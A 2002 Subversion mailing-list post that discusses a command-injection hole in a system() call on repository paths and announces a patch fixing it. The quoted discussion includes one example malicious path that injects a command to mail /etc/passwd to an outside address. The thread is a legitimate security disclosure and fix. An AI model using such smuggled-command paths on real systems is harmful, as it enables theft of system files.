Karl Fogel <kfogel@newton.ch.collab.net> writes:
> Ulrich Drepper <drepper@redhat.com> writes:
> > A svn repository can be set up by somebody with foul intentions.
> > Somebody else accesses it and the system() call gets executed on the
> > paths chosen by whoever created it. Then the patch could be something
> > like in this example:
> >
> > cat /dev/$(mail to-me@test.com < /etc/passwd; echo null)
> >
> > If the appropriate path component is never really shown anywhere this
> > might go completely unnoticed.
>
> Yeah, but the victim would have to fail to notice the strange path.
> Remember, the path is on the command line they're invoking -- so the
> relevant path component *is* shown before they run the commit command.
>
> I'm not saying it's not a hole, it's just a difficult one to exploit,
> as it requires gross inattention on the part of the user. That's why
> I'm not viewing it as a showstopper, is all.
And here's the patch to fix the hole/problem, using the cd method. As
a free bonus, it also fixes a spelling misteak and a small other bug.
:-)
(The other bug being that the cleanup code could use tmpfile_native in
a situation where that variable wasn't even initialized. That's
gotos for you... :)
Enjoy, and happy Alpha-day!
// Marcus
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@subversion.tigris.org
For additional commands, e-mail: dev-help@subversion.tigris.org
Received on Tue Jul 23 23:40:13 2002